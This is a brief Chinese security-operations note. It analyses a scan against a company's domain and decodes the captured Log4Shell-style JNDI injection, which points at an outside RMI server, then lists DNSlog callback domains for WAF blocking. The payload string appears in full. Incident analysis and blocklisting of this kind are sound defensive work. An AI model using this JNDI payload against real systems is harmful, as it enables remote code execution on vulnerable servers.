发现一个国内的IP在扫描公司的域名,211.139.184.157
看一下他的payload是啥
/portal/theme/manifest.json?_r=${jndi:rmi://120.78.8.33:7500/i/hcSvqI7U/5557c9/57ro/aw2p/PQ5P8iBh/}&apiversion=${jndi:rmi://120.78.8.33:7500/i/hcSvqI7U/e86b35/57ro/lc7f/PQ5P8iBh/} (/portal/theme/manifest.json?_r=%24%7Bjndi%3Armi%3A%2F%2F120.78.8.33%3A7500%2Fi%2FhcSvqI7U%2F5557c9%2F57ro%2Faw2p%2FPQ5P8iBh%2F%7D&apiversion=%24%7Bjndi%3Armi%3A%2F%2F120.78.8.33%3A7500%2Fi%2FhcSvqI7U%2Fe86b35%2F57ro%2Flc7f%2FPQ5P8iBh%2F%7D)
url解码一下
/portal/theme/manifest.json?_r=${jndi:rmi://120.78.8.33:7500/i/hcSvqI7U/5557c9/57ro/aw2p/PQ5P8iBh/}&apiversion=${jndi:rmi://120.78.8.33:7500/i/hcSvqI7U/e86b35/57ro/lc7f/PQ5P8iBh/} (/portal/theme/manifest.json?_r=${jndi:rmi://120.78.8.33:7500/i/hcSvqI7U/5557c9/57ro/aw2p/PQ5P8iBh/}&apiversion=${jndi:rmi://120.78.8.33:7500/i/hcSvqI7U/e86b35/57ro/lc7f/PQ5P8iBh/})
发起攻击的后台网站是:http://120.78.8.33:7500/cland/#/
Cland Beta:github.com/chaitin/xra… ,这个是x-ray开源的一个平台
这种一看就是在进行安全测试,用的住宅的IP扫描,挂阿里云主机payload
ceye.io
dnslog.link
dnslog.io
dnslog.cn
hyuga.co
tu4.org
ydscan.net
burpcollaborator.net
dns1.tk
eyes.sh
这些DNSlog域名都可以在WAF上直接封禁了。
